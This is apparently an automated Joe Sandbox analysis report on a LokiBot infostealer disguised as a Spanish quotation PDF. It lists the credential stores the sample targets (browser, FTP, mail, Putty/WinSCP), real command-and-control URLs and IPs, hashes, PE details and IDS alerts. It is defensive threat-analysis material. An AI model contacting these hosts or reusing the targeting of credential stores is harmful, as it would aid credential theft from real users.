              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe Code function: 12_2_00406069 GetUserNameW,12_2_00406069
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information:

              Yara detected Lokibot
              Source: Yara match File source: 12.2.Cotizaci#U00f3n.pdf.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 2.2.Cotizaci#U00f3n.pdf.exe.3f7b4b8.3.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 12.2.Cotizaci#U00f3n.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match File source: 00000002.00000002.288729980.0000000002D8C000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match File source: 00000002.00000002.290079691.0000000003E50000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match File source: Process Memory Space: Cotizaci#U00f3n.pdf.exe PID: 2644, type: MEMORY
              Source: Yara match File source: Process Memory Space: Cotizaci#U00f3n.pdf.exe PID: 3492, type: MEMORY
              Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Tries to harvest and steal ftp login credentials
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
              Tries to steal Mail credentials (via file access)
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
              Tries to steal Mail credentials (via file registry)
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe Code function: PopPassword 12_2_0040D069
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe Code function: SmtpPassword 12_2_0040D069

              Mitre Att&ck Matrix

              Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
              Valid Accounts | Windows Management Instrumentation | Path Interception | Access Token Manipulation 1 | Masquerading 11 | OS Credential Dumping 2 | Security Software Discovery 111 | Remote Services | Email Collection 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
              Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Process Injection 112 | Disable or Modify Tools 1 | Credentials in Registry 2 | Process Discovery 2 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
              Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 21 | Security Account Manager | Virtualization/Sandbox Evasion 21 | SMB/Windows Admin Shares | Data from Local System 2 | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
              Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Access Token Manipulation 1 | NTDS | Account Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 113 | SIM Card Swap | | Carrier Billing Fraud
              Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Process Injection 112 | LSA Secrets | System Owner/User Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
              Replication Through Removable Media | Launchd | Rc.common | Rc.common | Deobfuscate/Decode Files or Information 1 | Cached Domain Credentials | Remote System Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
              External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information 13 | DCSync | File and Directory Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
              Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Software Packing 13 | Proc Filesystem | System Information Discovery 13 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              No Antivirus matches

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              Source | Detection | Scanner | Label
              12.2.Cotizaci#U00f3n.pdf.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
              2.2.Cotizaci#U00f3n.pdf.exe.3f7b4b8.3.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

              Domains

              No Antivirus matches

              URLs

              Domains and IPs

              Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
zamloki.xyz | 172.67.155.45 | true | true | - | unknown

                Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://zamloki.xyz/des/co/tox.php | true | Avira URL Cloud: safe | unknown
http://kbfvzoboss.bid/alien/fre.php | true | URL Reputation: safe | unknown
http://alphastand.top/alien/fre.php | true | URL Reputation: safe | unknown
http://alphastand.win/alien/fre.php | true | URL Reputation: safe | unknown
http://alphastand.trade/alien/fre.php | true | URL Reputation: safe | unknown

                URLs from Memory and Binaries


                                    Contacted IPs


                                    Public

IP | Domain | Country | ASN | ASN Name | Malicious
172.67.155.45 | zamloki.xyz | United States | 13335 | CLOUDFLARENETUS | true
104.21.6.222 | unknown | United States | 13335 | CLOUDFLARENETUS | true

                                    Private

                                    IP
                                    192.168.2.1

                                    General Information

                                    Joe Sandbox Version:33.0.0 White Diamond
                                    Analysis ID:451993
                                    Start date:21.07.2021
                                    Start time:17:00:18
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 9m 25s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Sample file name:Cotizaci#U00f3n.pdf.exe
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                    Number of analysed new started processes analysed:26
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.troj.spyw.evad.winEXE@5/3@137/3
                                    EGA Information:Failed
                                    HDC Information:
                                    • Successful, ratio: 94.4% (good quality ratio 90.6%)
                                    • Quality average: 77%
                                    • Quality standard deviation: 28.5%
                                    HCA Information:
                                    • Successful, ratio: 100%
                                    • Number of executed functions: 74
                                    • Number of non-executed functions: 33
                                    Cookbook Comments:
                                    • Adjust boot time
                                    • Enable AMSI
                                    • Found application associated with file extension: .exe
                                    Warnings:
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                    • Excluded IPs from analysis (whitelisted): 52.147.198.201, 23.54.113.53, 52.255.188.83, 40.88.32.150, 20.82.209.183, 23.54.113.104, 23.0.174.200, 23.0.174.185, 40.112.88.60, 23.10.249.43, 23.10.249.26, 20.82.210.154
                                    • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                    Simulations

                                    Behavior and APIs

Time | Type | Description
17:01:48 | API Interceptor | 134x Sleep call for process: Cotizaci#U00f3n.pdf.exe modified

                                    Joe Sandbox View / Context

                                    IPs

Match | Associated Sample Name / URL | Detection | Context
172.67.155.45 | Cotizaci#U00f3n.pdf.exe | malicious | zamloki.xyz/des/co/tox.php
104.21.6.222 | Cotizaci#U00f3n.pdf.exe | malicious | zamloki.xyz/des/co/tox.php

                                    Domains

Match | Associated Sample Name / URL | Detection | Context
zamloki.xyz | Cotizaci#U00f3n.pdf.exe | malicious | 104.21.6.222

                                    ASN


                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Cotizaci#U00f3n.pdf.exe.log
                                    Process:C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):1216
                                    Entropy (8bit):5.355304211458859
                                    Encrypted:false
                                    SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                    MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                    SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                    SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                    SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                    Malicious:false
                                    Reputation:high, very likely benign file
                                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck
                                    Process:C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    File Type:very short file (no magic)
                                    Category:dropped
                                    Size (bytes):1
                                    Entropy (8bit):0.0
                                    Encrypted:false
                                    SSDEEP:3:U:U
                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                    Malicious:false
                                    Reputation:high, very likely benign file
                                    Preview: 1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\414045e2d09286d5db2581e0d955d358_d06ed635-68f6-4e9a-955c-4899f5f57b9a
                                    Process:C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):25070
                                    Entropy (8bit):0.6027366787850104
                                    Encrypted:false
                                    SSDEEP:3:/lbOllbOllbOllbOllbOllbOllbOllbOllbOllbOllbOllbOllbOllbOllbOllb5:u
                                    MD5:96B49717F2D862FB05CF7DBF53DF6F24
                                    SHA1:93790D9C6DC1EACBD18D56CEA1E823592D7168D5
                                    SHA-256:B8FB6B3B3CD97AB851D85DA2E6121CCBF674166A68F1ADFDF10218F0AEEE2DF6
                                    SHA-512:D3F0EB89422CCFCBD6F08ECFAAFAB75DC0DB2310CE8779163EF7290D042146662686509DC4A7B8E93547B751EDA9819463C37CE25C7F1A4A8BE21E2A37485451
                                    Malicious:false
                                    Reputation:low
                                    Preview: ........................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user...................................

                                    Static File Info

                                    General

                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Entropy (8bit):7.162106870557344
                                    TrID:
                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                    • DOS Executable Generic (2002/1) 0.01%
                                    File name:Cotizaci#U00f3n.pdf.exe
                                    File size:1104896
                                    MD5:c3412fee75b0f8758ea9905930ec2f34
                                    SHA1:e9245aba2ee62a7baffbccb725bca4bc0fd0302e
                                    SHA256:a978c99ada8c0272b0670865cdecc324d883304d54f2e90ea829891183b3aaa9
                                    SHA512:65cbf40e4d180dcd0595ab33521bc32fae6587ba60edc0114d2d0afc5bb4773a9153895e36d7675d7d187feba6ef76b2992d97b6bfc4838202fc395cd46b8a5e
                                    SSDEEP:12288:UKEH2DIJaP/GBvpov6pCoRlMRWO9fYOiXrDEr3aNhE58ZqTuwMpELFasSAFQipPG:89Bvpov6zsbfVi3E8+KfgFsip+
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..../.`..............0.............>.... ... ....@.. .......................@............@................................

                                    File Icon

                                    Icon Hash:f0debeffdffeec70

                                    Static PE Info

                                    General

                                    Entrypoint:0x4b133e
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                    Time Stamp:0x60F82FB9 [Wed Jul 21 14:31:21 2021 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:v4.0.30319
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                    Entrypoint Preview

                                    Instruction
                                    jmp dword ptr [00402000h]
                                    mov ebp, 2D000002h
                                    add dword ptr [eax], eax
                                    add byte ptr [eax+eax+00390000h], al
                                    add byte ptr [eax], al
                                    pop ss
                                    add byte ptr [eax], al
                                    add byte ptr [edx], cl
                                    add byte ptr [eax], al
                                    add byte ptr [eax+eax], al
                                    add byte ptr [eax], al
                                    add dword ptr [eax], eax
                                    add byte ptr [eax], al

                                    Data Directories

                                    Name | Virtual Address | Virtual Size | Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb12ec | 0x4f | .text
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb2000 | 0x5e324 | .rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x112000 | 0xc | .reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                    Sections

                                    Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                    .text | 0x2000 | 0xaf364 | 0xaf400 | False | 0.835030592457 | data | 7.67256143073 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                    .rsrc | 0xb2000 | 0x5e324 | 0x5e400 | False | 0.167375559516 | data | 5.64067712054 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc | 0x112000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                    Resources

                                    Name | RVA | Size | Type | Language | Country
                                    RT_ICON | 0xb21a0 | 0x468 | GLS_BINARY_LSB_FIRST | |
                                    RT_ICON | 0xb2618 | 0x1128 | dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0 | |
                                    RT_ICON | 0xb3750 | 0x2668 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0 | |
                                    RT_ICON | 0xb5dc8 | 0x4428 | dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0 | |
                                    RT_ICON | 0xba200 | 0x11028 | dBase III DBT, version number 0, next free block index 40 | |
                                    RT_ICON | 0xcb238 | 0x44028 | data | |
                                    RT_GROUP_ICON | 0x10f270 | 0x5a | data | |
                                    RT_VERSION | 0x10f2dc | 0x30c | data | |
                                    RT_MANIFEST | 0x10f5f8 | 0xd25 | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF, LF line terminators | |

                                    Imports

                                    DLL | Import
                                    mscoree.dll | _CorExeMain

                                    Version Infos

                                    Description | Data
                                    Translation | 0x0000 0x04b0
                                    LegalCopyright | Copyright 2016
                                    Assembly Version | 1.0.0.0
                                    InternalName | BLjtZ.exe
                                    FileVersion | 1.0.0.0
                                    CompanyName |
                                    LegalTrademarks |
                                    Comments |
                                    ProductName | uNotepad
                                    ProductVersion | 1.0.0.0
                                    FileDescription | uNotepad
                                    OriginalFilename | BLjtZ.exe

                                    Network Behavior

                                    Snort IDS Alerts

                                    Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                    07/21/21-17:02:22.326074TCP2025381ET TROJAN LokiBot Checkin4979480192.168.2.3104.21.6.222
                                    07/21/21-17:02:22.876754TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979580192.168.2.3172.67.155.45
                                    07/21/21-17:02:22.876754TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979580192.168.2.3172.67.155.45
                                    07/21/21-17:02:22.876754TCP2025381ET TROJAN LokiBot Checkin4979580192.168.2.3172.67.155.45
                                    07/21/21-17:02:23.408568TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979680192.168.2.3172.67.155.45
                                    07/21/21-17:02:23.408568TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979680192.168.2.3172.67.155.45
                                    07/21/21-17:02:23.408568TCP2025381ET TROJAN LokiBot Checkin4979680192.168.2.3172.67.155.45
                                    07/21/21-17:02:23.925389TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979780192.168.2.3104.21.6.222
                                    07/21/21-17:02:23.925389TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979780192.168.2.3104.21.6.222
                                    07/21/21-17:02:23.925389TCP2025381ET TROJAN LokiBot Checkin4979780192.168.2.3104.21.6.222
                                    07/21/21-17:02:24.558291TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979880192.168.2.3104.21.6.222
                                    07/21/21-17:02:24.558291TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979880192.168.2.3104.21.6.222
                                    07/21/21-17:02:24.558291TCP2025381ET TROJAN LokiBot Checkin4979880192.168.2.3104.21.6.222
                                    07/21/21-17:02:25.091660TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979980192.168.2.3104.21.6.222
                                    07/21/21-17:02:25.091660TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979980192.168.2.3104.21.6.222
                                    07/21/21-17:02:25.091660TCP2025381ET TROJAN LokiBot Checkin4979980192.168.2.3104.21.6.222
                                    07/21/21-17:02:25.575841TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980080192.168.2.3172.67.155.45
                                    07/21/21-17:02:25.575841TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980080192.168.2.3172.67.155.45
                                    07/21/21-17:02:25.575841TCP2025381ET TROJAN LokiBot Checkin4980080192.168.2.3172.67.155.45
                                    07/21/21-17:02:26.075061TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980180192.168.2.3104.21.6.222
                                    07/21/21-17:02:26.075061TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980180192.168.2.3104.21.6.222
